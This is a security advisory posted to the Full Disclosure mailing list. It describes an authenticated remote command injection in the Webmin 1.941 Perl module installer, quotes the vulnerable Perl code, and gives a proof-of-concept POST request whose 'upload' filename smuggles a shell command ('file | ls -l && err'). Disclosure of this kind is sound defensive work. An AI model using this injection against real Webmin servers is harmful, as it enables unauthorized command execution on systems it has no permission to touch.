Document Title:
Webmin 1.941 (Install Module) Remote Command Injection Vulnerability

Common Vulnerability Scoring System:

Vulnerability Class:
Command Injection

Current Estimated Price:
2.000€ - 3.000€

Affected Product(s):

Exploitation Technique:

Severity Level:

Technical Details & Description:
A remote authenticated Command Injection vulnerability has been discovered
in the official Webmin product .
The security vulnerability allows a remote attacker with only permission to
"Install Module Perl Component"
to execute arbitrary Operating System Commands.
this is due to no check performed on the user input "upload" parameter when
it passed to open() perl function
causing execution of any command .

The vulnerability is located in the `/cpan/download.cgi` modules and the
`upload` parameter
of the module name to install.

The security risk of the arbitrary RCE vulnerability is estimated as High
with a cvss (common vulnerability scoring system) count of 8.5.
Exploitation of the RCE web vulnerability requires a low privilege
web-application user account and no user interaction.
Successful exploitation of the vulnerability results in loss of
availability, integrity and confidentiality.

##When digging in code :

I needed only to reach this line code to make it work :

&install_error(&text('download_etar', "<tt>$tar</tt>"));

However passing user input directly to open() is not a solution, this
includes also all these lines :

    open(TAR, "( gunzip -c $pfile | tar tf - ) 2>&1 |");
    system("cd $mtemp ; gunzip -c $dirs{$d} | tar xf - >/dev/null");
    system("$cmd >/dev/null 2>&1 </dev/null");
    %needreqs = map { eval "use $_"; $@ ? ($_, 1) : ($_, 0) } @allreqs;


Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /cpan/download.cgi

Vulnerable Parameter(s):
[+] upload

Server version

Proof of Concept (PoC):
The security vulnerability can be exploited by remote attackers with low
privileged web-application user account and with no user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.

1-Attacker must have permission to the Install Perl Modules component
2-Go to "Others"->"Perl Modules"->"Install Modules"->Select 'From Uploaded
File'->Pick Any file
3-attacker intercepts the request that follows :

--- PoC Session Logs [POST] ---

POST /cpan/download.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: download.cgi
X-Requested-From: cpan
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------
Content-Length: 682
Connection: close
Cookie: redirect=1; testing=1; sid=110b33c42e470d0aafa5ab11fe9d09a7

Content-Disposition: form-data; name="cpan"

Content-Disposition: form-data; name="local"

Content-Disposition: form-data; name="source"

Content-Disposition: form-data; name="upload"; filename="file | ls -l &&
Content-Type: [nothing here]

[Nothing Here]
Content-Disposition: form-data; name="url"


4-Modify the "upload" parameter with string : "file | ls -l && err"

##Successfully reproduced the Vulnerability.

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Reply via email to